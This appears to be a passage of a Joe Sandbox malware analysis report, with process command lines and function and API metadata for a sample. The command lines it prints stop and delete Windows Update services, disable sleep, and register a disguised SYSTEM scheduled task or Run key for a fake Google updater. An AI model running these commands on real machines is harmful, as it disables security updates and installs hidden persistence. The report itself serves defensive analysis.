Commandline:	C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff74e4d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff74e4d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop UsoSvc
Imagebase:	0x7ff6d9b80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0x7ff77f210000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#zfjwxc#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }
Imagebase:	0x7ff7be880000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop WaaSMedicSvc
Imagebase:	0x7ff6d9b80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0x7ff77f210000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop wuauserv
Imagebase:	0x7ff6d9b80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0x7ff77f210000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	16:20:28
Start date:	28/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop bits
Imagebase:	0x7ff6d9b80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	16:20:29
Start date:	28/12/2024
Path:	C:\Windows\System32\powercfg.exe
Wow64 process (32bit):	false
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0x7ff77f210000
File size:	96'256 bytes
MD5 hash:	9CA38BE255FFF57A92BD6FBF8052B705
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	16:20:29
Start date:	28/12/2024
Path:	C:\Windows\System32\sc.exe
Wow64 process (32bit):	false
Commandline:	sc stop dosvc
Imagebase:	0x7ff6d9b80000
File size:	72'192 bytes
MD5 hash:	3FB5CF71F7E7EB49790CB0E663434D80
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	16:20:29
Start date:	28/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
Imagebase:	0x7ff608820000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	16:20:29
Start date:	28/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
Imagebase:	0x7ff608820000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	16:20:29
Start date:	28/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
Imagebase:	0x7ff608820000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	16:20:30
Start date:	28/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
Imagebase:	0x7ff608820000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	16:20:30
Start date:	28/12/2024
Path:	C:\Windows\System32\reg.exe
Wow64 process (32bit):	false
Commandline:	reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
Imagebase:	0x7ff608820000
File size:	77'312 bytes
MD5 hash:	227F63E1D9008B36BDBCC4B397780BE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	16:20:58
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\conhost.exe ubulqosn
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	59
Start time:	16:20:58
Start date:	28/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
Imagebase:	0x7ff74e4d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	16:20:58
Start date:	28/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	16:20:58
Start date:	28/12/2024
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
Imagebase:	0x7ff74e4d0000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	2.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	104
Total number of Limit Nodes:	1

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00401DF4 Relevance: 1.5, APIs: 1, Instructions: 13
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetTempPathA.KERNEL32(00000104,?,?,00402214,00402368,00000000,00404690,00000000,00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000), ref: 00401E03

Memory Dump Source

Source File: 00000000.00000002.2061151113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2061127944.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061174295.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061226756.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061226756.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SharcHack.jbxd

Similarity

API ID: PathTemp
String ID:
API String ID: 2920410445-0
Opcode ID: 6cf1d2df8bd522a178f4ed81ea5d7cdc32367c966c146d3297076e8c248fb5b9
Instruction ID: 513a9b3b554f811413e29e48005847e0932e621cb9bcb8d43a6f4abbd4cc9e18
Opcode Fuzzy Hash: 6cf1d2df8bd522a178f4ed81ea5d7cdc32367c966c146d3297076e8c248fb5b9
Instruction Fuzzy Hash: F2C08CA1B8120013E20020AA4C836EA30498388320F90003A3BA5AA3D2ECAE599511AB

Non-executed Functions

Function 004011AC Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 37
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryA.KERNEL32(00000105,?,00000000,?,00401CC0,?,00402287,00402368,00000000,00404690,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004011DE
SetCurrentDirectoryA.KERNEL32(?,00000105,?,00000000,?,00401CC0,?,00402287,00402368,00000000,00404690,00000000,00000000,00000000,00000000,00000000), ref: 004011E4
GetCurrentDirectoryA.KERNEL32(00000105,?,00000000,?,00401CC0,?,00402287,00402368,00000000,00404690,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004011F3
SetCurrentDirectoryA.KERNEL32(?,00000105,?,00000000,?,00401CC0,?,00402287,00402368,00000000,00404690,00000000,00000000,00000000,00000000,00000000), ref: 00401204

Strings

:, xrefs: 004011C7

Memory Dump Source

Source File: 00000000.00000002.2061151113.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2061127944.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061174295.0000000000404000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061226756.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061226756.0000000000E08000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_SharcHack.jbxd

Similarity

API ID: CurrentDirectory
String ID: :
API String ID: 1611563598-336475711
Opcode ID: 2ca17c48bc424910a8f9f500c9fc05f368bba687e9ee49d64decfca2fad3f822
Instruction ID: d7ef50a895c70e87defade85c564fe35ef19071810822f113715ad03dbd86815
Opcode Fuzzy Hash: 2ca17c48bc424910a8f9f500c9fc05f368bba687e9ee49d64decfca2fad3f822
Instruction Fuzzy Hash: 4BF096712447C41ED310E6788852BDB72DC8B55344F04843EB6D8EB3D2F67989888767

Analysis Process: 3.exePID: 1988, Parent PID: 6192COMMON

Execution Graph

Execution Coverage:	13.2%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	38.4%
Total number of Nodes:	865
Total number of Limit Nodes:	5

Executed Functions

Function 00007FF69AF11880 Relevance: 57.3, APIs: 30, Strings: 2, Instructions: 1295COMMON

Download Yara Rule

APIs

_wgetenv.MSVCRT ref: 00007FF69AF11A1A
memset.MSVCRT ref: 00007FF69AF11A3E
memset.MSVCRT ref: 00007FF69AF11B07
memcpy.MSVCRT ref: 00007FF69AF11BF8
memcpy.MSVCRT ref: 00007FF69AF11C90
memcpy.MSVCRT ref: 00007FF69AF11D27
memset.MSVCRT ref: 00007FF69AF11DC2
GetModuleFileNameW.KERNEL32 ref: 00007FF69AF11DD2
memset.MSVCRT ref: 00007FF69AF11DEB
_wgetenv.MSVCRT ref: 00007FF69AF11F74
memcpy.MSVCRT ref: 00007FF69AF11F95
memcpy.MSVCRT ref: 00007FF69AF11FD1
memset.MSVCRT ref: 00007FF69AF12070
_wcsicmp.MSVCRT ref: 00007FF69AF12108
memset.MSVCRT ref: 00007FF69AF12128
memset.MSVCRT ref: 00007FF69AF122EA
_wgetenv.MSVCRT ref: 00007FF69AF1244A
memset.MSVCRT ref: 00007FF69AF1246E
memcpy.MSVCRT ref: 00007FF69AF127D7
memcpy.MSVCRT ref: 00007FF69AF12812
memcpy.MSVCRT ref: 00007FF69AF12AFA
memcpy.MSVCRT ref: 00007FF69AF12B37
_wcsicmp.MSVCRT ref: 00007FF69AF12C3F

Strings

;CCSS, xrefs: 00007FF69AF12AC7
;CCSS, xrefs: 00007FF69AF127A7

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: memcpy$memset$_wgetenv$_wcsicmp$FileModuleName
String ID: ;CCSS$;CCSS
API String ID: 3458694336-1817814430
Opcode ID: 4b8c6a12f787f2b6716ab02252fa4d4ab0274091cda3a2d916eccf0da0cd29e4
Instruction ID: 8c53a1f5bf2b0e03d6047075e353988d41b353f7d96dc59bad1b067644b176f8
Opcode Fuzzy Hash: 4b8c6a12f787f2b6716ab02252fa4d4ab0274091cda3a2d916eccf0da0cd29e4
Instruction Fuzzy Hash: CDE27BA2A08B8685EB718B25E8593BA77E1FB957C4F4040B5DA8D87B95EF3CE150C700

Function 00007FF69AF131E0 Relevance: 26.6, APIs: 12, Strings: 3, Instructions: 387
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF69AF132E6
wcslen.MSVCRT ref: 00007FF69AF1335E
memset.MSVCRT ref: 00007FF69AF13387
wcscpy.MSVCRT ref: 00007FF69AF13392
wcslen.MSVCRT ref: 00007FF69AF1339A
memset.MSVCRT ref: 00007FF69AF133D6
wcscpy.MSVCRT ref: 00007FF69AF133E1
wcslen.MSVCRT ref: 00007FF69AF133E9
wcslen.MSVCRT ref: 00007FF69AF13407
wcslen.MSVCRT ref: 00007FF69AF1341C
wcslen.MSVCRT ref: 00007FF69AF13429
wcsncmp.MSVCRT ref: 00007FF69AF13957

Strings

0, xrefs: 00007FF69AF1399E
X, xrefs: 00007FF69AF13611
`, xrefs: 00007FF69AF13657

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: wcslen$memset$wcscpy$wcsncmp
String ID: 0$X$`
API String ID: 4021896446-2527496196
Opcode ID: 5dfd92650deef2131241ba9aa21a97c289f7b13a7489559770a67fde3b4408bd
Instruction ID: 171109fbe94dacbad58f2a6312dfa2712b407412d6a27b772f3bb73dfa9f0dc7
Opcode Fuzzy Hash: 5dfd92650deef2131241ba9aa21a97c289f7b13a7489559770a67fde3b4408bd
Instruction Fuzzy Hash: 1A127C62A18BC185E3718F25E5043AAB7A0FB95794F008365EE9C97BD9EF7CD184CB40

Function 00007FF69AF11180 Relevance: 10.7, APIs: 7, Instructions: 206
sleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00007FF69AF111E1
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF69AF11253
malloc.MSVCRT ref: 00007FF69AF11307
malloc.MSVCRT ref: 00007FF69AF11354
memcpy.MSVCRT ref: 00007FF69AF11368
GetStartupInfoW.KERNEL32 ref: 00007FF69AF11483

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpy
String ID:
API String ID: 772431862-0
Opcode ID: 8cb9c930c091871e2a32b8ca82a4e29d5b1292fd2592a546d7c2f9fc4b5aa782
Instruction ID: 6510b897a66fc9ffa565c56bf72e77d26424d7182098d48f1eb471c491180082
Opcode Fuzzy Hash: 8cb9c930c091871e2a32b8ca82a4e29d5b1292fd2592a546d7c2f9fc4b5aa782
Instruction Fuzzy Hash: D99154B2E0864A85FB309B16EA4477933E1EF49B94F8481F9CA0DC77A5DF2DA950C304

Function 00007FF69AF16060 Relevance: 4.5, APIs: 3, Instructions: 20
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TlsGetValue.KERNEL32 ref: 00007FF69AF16076
TlsSetValue.KERNEL32 ref: 00007FF69AF16096
TlsFree.KERNEL32 ref: 00007FF69AF160A2

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: Value$Free
String ID:
API String ID: 2242701089-0
Opcode ID: 73d530ef449843e6409f0cc36623cc1827a3a45e5528ad8b59a677982093e437
Instruction ID: 4dae279c3f6175f757a8c99251bfaa4a02b8d04b021159dbbb295cd14940219d
Opcode Fuzzy Hash: 73d530ef449843e6409f0cc36623cc1827a3a45e5528ad8b59a677982093e437
Instruction Fuzzy Hash: 31F09865E1854B96E630EB20EA554397761FB98394F8440F4D94D872B5DE2CEA05DB00

Function 00007FF69AF14320 Relevance: 3.8, APIs: 3, Instructions: 71
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

wcslen.MSVCRT ref: 00007FF69AF14341
memset.MSVCRT ref: 00007FF69AF14379
wcscpy.MSVCRT ref: 00007FF69AF14384

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: memsetwcscpywcslen
String ID:
API String ID: 3616488086-0
Opcode ID: b2d8096be2b83d84b0644b4fd8c5469c4767b560b69be31ccf18f20abda553e9
Instruction ID: 8a1e6249ae1991a105d07f73df1a373c2b5eb09a7af8120ed7a2968905c0e007
Opcode Fuzzy Hash: b2d8096be2b83d84b0644b4fd8c5469c4767b560b69be31ccf18f20abda553e9
Instruction Fuzzy Hash: 7021D3A2A1828595F6309F11A4047BBB6A0FBC57A4F8002B5EF9D87AD9DF7DE146C700

Function 00007FF69AF13A30 Relevance: 1.3, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00007FF69AF13A5E

Part of subcall function 00007FF69AF131E0: memset.MSVCRT ref: 00007FF69AF132E6
Part of subcall function 00007FF69AF131E0: wcslen.MSVCRT ref: 00007FF69AF1335E
Part of subcall function 00007FF69AF131E0: memset.MSVCRT ref: 00007FF69AF13387
Part of subcall function 00007FF69AF131E0: wcscpy.MSVCRT ref: 00007FF69AF13392
Part of subcall function 00007FF69AF131E0: wcslen.MSVCRT ref: 00007FF69AF1339A

Memory Dump Source

Source File: 00000002.00000002.2291043393.00007FF69AF11000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF69AF10000, based on PE: true

Associated: 00000002.00000002.2290201538.00007FF69AF10000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291131469.00007FF69AF1C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2291226330.00007FF69AF1E000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292014114.00007FF69B297000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292036248.00007FF69B299000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292088777.00007FF69B29D000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292112408.00007FF69B2A0000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2292136567.00007FF69B2A1000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff69af10000_3.jbxd

Similarity

API ID: memset$wcslen$wcscpy
String ID:
API String ID: 3662116142-0
Opcode ID: 883472445985aba1a67f113e38a42d216cb9e88e05912989ae069315022e1a5c
Instruction ID: c134f9f63a8eb13ee5da347bc5710b61ab0b4dfbf5cefa226ac5eac7d02c84e3
Opcode Fuzzy Hash: 883472445985aba1a67f113e38a42d216cb9e88e05912989ae069315022e1a5c
